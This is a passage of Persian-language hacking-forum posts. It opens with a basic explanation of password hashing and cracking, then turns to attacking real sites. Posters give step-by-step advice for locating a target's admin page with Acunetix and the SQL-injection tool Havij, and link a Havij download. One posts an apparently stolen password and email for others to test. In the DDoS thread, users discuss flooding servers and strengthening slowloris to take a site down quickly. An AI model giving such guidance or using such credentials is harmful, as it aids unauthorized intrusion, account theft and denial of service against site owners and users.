متخصصین امنیت محسوب مشود برای جلوگیری از دسترسی نفوذگر(hacker) و یا حداقل سخت کردن کار هکر برای دسترسی به گذرواژه به جای قرار دادن مستقیم گذرواژه (password) ابتدا گذرواژه را با استفاده از انواع الگوریتم مورد نظر هش کرده و سبس در دیتابیس قرار میدهیم. فرض کنید میخواهید فایلی از وبسایت یا شخصی که آشنایی چندانی نسبت به آن ندارید دانلود کنید به این نکته باید توجه داشته باشید که ممکن است فایلی که به شما داده میشود اصل فایل نباشد یا ممکن است فایل دریافتی را نفوذگر آلوده کرده باشد و از طریق آن بتواند از سیستم شما دسترسی بگیرد یا اطلاعات شما را به تاراج ببرد هش اینجا به شما کمک میکند اگر وبسایت حاوی آن فایل یک هش برای فایل مورد نظر در سایت قرار داده باشد شما میتوانید با مشاهده ی و مقایسه ی هش ها از سالم بودن فایل ها اطمینان حاصل فرمایید... آیا هش ها قابل رمزگشایی هستند؟ هرچند الگوریتم هش کردن یک طرفه است اما نفوذگر ها توانسته اند با انجام نوعی حملات brute-force , dictionary attack هش ها را رمزگشایی کنند .برای اینکار آنها تعداد زیادی متن را تبدیل به هش میکنند و هش های حاصل را با هش مورد نظر مقایسه میکنند ،در صورتی که هردو هش یکسان باشند پسورد ها نیز یکسان هستند که در بست های آینده به امید خدا این آموزشها در همین تابیک قرار خواهد گرفت...
  46. 1 امتیاز
    دوست عزیز بنده با یکسری از ابزارها مانند اسکنر اکانتیکس برای شما سرچ زدم اما صفحه ادمین که در اصل login.php/ بوده رو ادمین بسته و شما اجازه به دسترسی صفحه ورودی ادمین را ندارین . اینرا هم در جهت راهنمایی عرض می کنم که اگر بدنیال صفحه ادمین بودین چندین مبحث رو پله به پله پیش برید تا به نتیجه برسید : 1- مشخص کنید تارگت مورد نظر از چه CMS استفاده می کنه چون اگر از بطور مثال از وردپرس استفاده می کنه صفحه ادمینش : target.com/wp-admin خواهد بود . 2- استفاده از هویج به دلیل اینه اگر قابل پیمایش باشه خیلی سریعتر برای شما نمایش میده . 3- استفاده از اسکنر اکانتیکس Acunetix 4- استفاده از اسکریپتهای پرل و ...
  47. 1 امتیاز
    رمزش 123456789 ایمیل:ahmet@gurbuz.info اما می گه پسورد اشتباهه.هم به صورت دستی هم با استفاده از هویج این به دست اومد.ممنون میشم تست کنید
  48. 1 امتیاز
    راحت ترين راه حل اينه كه از نرم افزار هويج استفاده كني و يا از user name هاي عمومي رو امتحان كني تا جواب بگيري لينك دانلود نرم افزار هويج در انجمن http://guardiran.org/forums/index.php?/topic/39-havij-117-pro/
  49. 1 امتیاز
    kingdeface

    سوال در مورد Ddos

    سلام ببینید من نميدونم شما تا چه حد با این حملات آشنایی دارین اما اینو بدونید باید که حجم پکتهای ارسالی شما باید بیش از پکتهایی باشه که سرور میتونه پاسخگو باشه. راه دیگه اینه که از طریق vps حمله رو انجام بدین. بازهم سوالی بود درخدمتم.
  50. 1 امتیاز
    gtstars

    سوال در مورد Ddos

    الان تو اسکریپت slowloris باید با www وارد کنم ؟؟؟ من طبق دستورهایی که تو ویدیو آموزشی دادید جلو رفتم. لطفا یه جور واضح بگید که چطور قوی ترش کنم تا سایت مقابل سریع down بشه